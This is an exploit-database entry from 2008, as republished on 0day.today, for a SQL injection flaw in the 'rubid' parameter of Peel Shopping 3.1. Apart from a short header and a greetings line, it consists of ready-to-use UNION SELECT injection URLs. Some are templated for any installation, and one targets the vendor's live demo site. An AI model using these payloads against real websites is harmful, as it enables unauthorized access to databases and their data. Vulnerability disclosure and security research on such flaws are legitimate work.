Peel Shopping 3.1 (index.php rubid) SQL Injection Vulnerability

2008-12-09T00:00:00
ID 1337DAY-ID-4395
Type zdt
Reporter SuB-ZeRo
Modified 2008-12-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Peel Shopping 3.1 (index.php rubid) SQL Injection Vulnerability
===============================================================


            PEEL Remote SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------

[+]Discovred by : SuB-ZeRo
[+]Vendor URL : http://www.peel.fr/
[+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html
[+]DoRk: FiNd It (SoOrY)
[+]exploit:
[+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3--
[+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3--
[+]l!ve demo:
[+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3--
 
----------------------------------------------------------------------------------------------------------------------
[+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme
----------------------------------------------------------------------------------------------------------------------



#  0day.today [2018-03-01]  #